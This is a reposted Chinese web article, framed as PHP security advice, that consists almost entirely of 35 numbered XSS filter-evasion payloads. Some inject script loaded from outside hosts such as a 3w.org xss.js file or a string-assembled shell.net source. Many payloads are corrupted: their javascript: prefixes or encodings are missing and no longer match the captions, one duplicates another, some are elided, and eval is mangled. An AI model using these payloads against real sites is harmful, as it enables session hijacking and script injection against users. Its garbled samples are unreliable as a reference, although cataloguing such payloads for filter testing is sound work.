加入收藏 | 设为首页 | 会员中心 | 我要投稿 莱芜站长网 (https://www.0634zz.com/)- 云连接、建站、智能边缘云、设备管理、大数据!
当前位置: 首页 > 编程开发 > PHP > 正文

PHP安全防范之XSS跨站示例大全

发布时间:2020-08-01 19:43:31 所属栏目:PHP 来源:互联网
导读:介绍《PHP安全防范之XSS跨站示例大全》开发教程,希望对您有用。

《PHP安全防范之XSS跨站示例大全》要点:
本文介绍了PHP安全防范之XSS跨站示例大全,希望对您有用。如果有疑问,可以联系我们。

(1)普通的XSS JavaScript注入

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>


(2)IMG标签XSS使用JavaScript命令

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>


(3)IMG标签无分号无引号

<IMG SRC=alert(‘XSS’)>


(4)IMG标签大小写不敏感

<IMG SRC=alert(‘XSS’)>


(5)HTML编码(必须有分号)

<IMG SRC=alert(“XSS”)>


(6)修正缺陷IMG标签

<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>


(7)formCharCode标签(计算器)

<IMG SRC=alert(String.fromCharCode(88,83,83))>


(8)UTF-8的Unicode编码(计算器)

<IMG SRC=jav..省略..S')>


(9)7位的UTF-8的Unicode编码是没有分号的(计算器)

<IMG SRC=jav..省略..S')>


(10)十六进制编码也是没有分号(计算器)

<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>


(11)嵌入式标签,将Javascript分开

<IMG SRC=”alert(‘XSS’);”>


(12)嵌入式编码标签,将Javascript分开

<IMG SRC=”alert(‘XSS’);”>


(13)嵌入式换行符

<IMG SRC=”alert(‘XSS’);”>


(14)嵌入式回车

<IMG SRC=”alert(‘XSS’);”>


(15)嵌入式多行注入JavaScript,这是XSS极端的例子

<IMG SRC=”alert(‘XSS‘)”>


(16)解决限制字符(要求同页面)

<script>z=’document.’</script>

<script>z=z+’write(“‘</script>

<script>z=z+’<script’</script>

<script>z=z+’ src=ht’</script>

<script>z=z+’tp://ww’</script>

<script>z=z+’w.shell’</script>

<script>z=z+’.net/1.’</script>

<script>z=z+’js></sc’</script>

<script>z=z+’ript>”)’</script>

<script>eval_r(z)</script>


(17)空字符

perl -e ‘print “<IMG SRC=javascript:alert(”XSS”)>”;’ > out


(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用

perl -e ‘print “<SCRIPT>alert(”XSS”)</SCRIPT>”;’ > out


(19)Spaces和meta前的IMG标签

<IMG SRC=” alert(‘XSS’);”>


(20)Non-alpha-non-digit XSS

<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>


(21)Non-alpha-non-digit XSS to 2

<BODY onload!#$%&()*~+-_.,:;?@[/|]^`=alert(“XSS”)>


(22)Non-alpha-non-digit XSS to 3

<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>


(23)双开括号

<<SCRIPT>alert(“XSS”);//<</SCRIPT>


(24)无结束脚本标记(仅火狐等浏览器)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>


(25)无结束脚本标记2

<SCRIPT SRC=//3w.org/XSS/xss.js>


(26)半开的HTML/JavaScript XSS

<IMG SRC=”alert(‘XSS’)”


(27)双开角括号

<iframe src=http://3w.org/XSS.html <


(28)无单引号 双引号 分号

<SCRIPT>a=/XSS/

alert(a.source)</SCRIPT>


(29)换码过滤的JavaScript

”;alert(‘XSS’);//


(30)结束Title标签

</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>


(31)Input Image

<INPUT SRC=”alert(‘XSS’);”>


(32)BODY Image

<BODY BACKGROUND=”alert(‘XSS’)”>


(33)BODY标签

<BODY(‘XSS’)>


(34)IMG Dynsrc

<IMG DYNSRC=”alert(‘XSS’)”>


(35)IMG Lowsrc

<IMG LOWSRC=”alert(‘XSS’)”>


(编辑:莱芜站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
    相关内容
      推荐文章
        站长推荐
        热点阅读

          【免责声明】本站内容转载自互联网,其发布内容言论不代表本站观点,如果其链接、内容的侵犯您的权益,烦请提交相关链接至邮箱bqsm@foxmail.com我们将及时予以处理。

          建议您使用1920×1080分辨率、谷歌浏览器Google Chrome、Microsoft Edge以获得本站的非凡浏览效果

          Copygight © 2016-2023 https://www.0634zz.com/ All Rights Reserved. 莱芜站长网